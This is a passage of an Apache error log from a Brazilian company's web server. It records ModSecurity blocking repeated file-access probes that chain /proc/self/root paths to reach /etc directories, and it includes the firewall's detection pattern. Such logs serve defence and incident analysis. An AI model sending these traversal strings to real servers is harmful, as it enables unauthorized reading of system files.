[Wed Mar 18 07:48:10.902058 2026] [mime_magic:error] [pid 30077:tid 140411716749056] (70014)End of file found: [client 74.7.241.31:45604] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/usr/lib/rpm/platform
[Wed Mar 18 07:48:22.243598 2026] [mime_magic:error] [pid 17653:tid 140411540502272] (70014)End of file found: [client 216.73.216.191:36748] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:48:28.291519 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.241.31:45610] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqC_Mdf6f5d65gmYZS0yQAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:48:31.247150 2026] [:error] [pid 15051:tid 140411641214720] [client 74.7.243.128:34898] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqC_ymAPhZkrhU8w4lOVgAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:48:32.662868 2026] [mime_magic:error] [pid 26799:tid 140411725141760] (70014)End of file found: [client 57.141.18.103:37296] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:48:51.655370 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.243.128:34800] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqDE0zinOy1jxa1j4fzHwAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:49:01.737249 2026] [mime_magic:error] [pid 15051:tid 140411674785536] (70014)End of file found: [client 57.141.18.118:38176] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:49:08.181791 2026] [mime_magic:error] [pid 15051:tid 140411716749056] (70014)End of file found: [client 216.73.216.191:38506] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:49:08.803623 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.243.128:53672] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqDJAkwaGbbGflqUZDxqgAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:49:14.460214 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.243.128:45534] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqDKsdf6f5d65gmYZS09AAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:49:23.726117 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:45550] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqDM_u8EFLIOrSqIpvmxwAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:49:29.741788 2026] [mime_magic:error] [pid 19507:tid 140411666392832] (70014)End of file found: [client 216.73.216.191:39898] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:49:39.605333 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:38148] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqDQ-yqAr6etmhZHNqdoQAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:50:03.582855 2026] [mime_magic:error] [pid 31803:tid 140411725141760] (70014)End of file found: [client 57.141.18.94:41904] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:50:05.542378 2026] [mime_magic:error] [pid 17887:tid 140411691570944] (70014)End of file found: [client 216.73.216.191:41514] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:50:05.765705 2026] [mime_magic:error] [pid 19507:tid 140411708356352] (70014)End of file found: [client 216.73.216.191:41860] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:50:14.096878 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:36082] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqDZeoXxyEfFpUF8f9P-QAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:50:19.311195 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.241.31:41070] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqDa9Y0UrI5A3LftIx_IAAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:50:55.211279 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.243.128:55838] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqDj-w_le52K8_3pV3A8QAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:51:00.173193 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.243.128:58412] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqDlCmAPhZkrhU8w4lPCQAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:51:08.544655 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.241.31:48922] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqDnOyqAr6etmhZHNqeIwAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:51:11.687549 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.243.128:54986] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqDnwkwaGbbGflqUZDyJwAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:51:14.656591 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.241.31:37108] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqDovu8EFLIOrSqIpvnNAAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:51:17.628586 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.243.128:39424] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqDpMdf6f5d65gmYZS1eQAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:51:29.626529 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:34478] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqDsOyqAr6etmhZHNqeSAAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:51:38.519290 2026] [mime_magic:error] [pid 11816:tid 140411624429312] (70014)End of file found: [client 57.141.18.32:47242] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:51:54.604860 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.243.128:52226] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqDytY0UrI5A3LftIx_lwAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:52:01.047848 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:34590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqD0da6ubjKNq_cu4Z5OgAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:52:32.998985 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:38952] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqD8Pu8EFLIOrSqIpvnhwAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:52:52.943455 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.243.128:38742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqEBEzinOy1jxa1j4f0FwAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:53:03.931032 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.241.31:58082] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 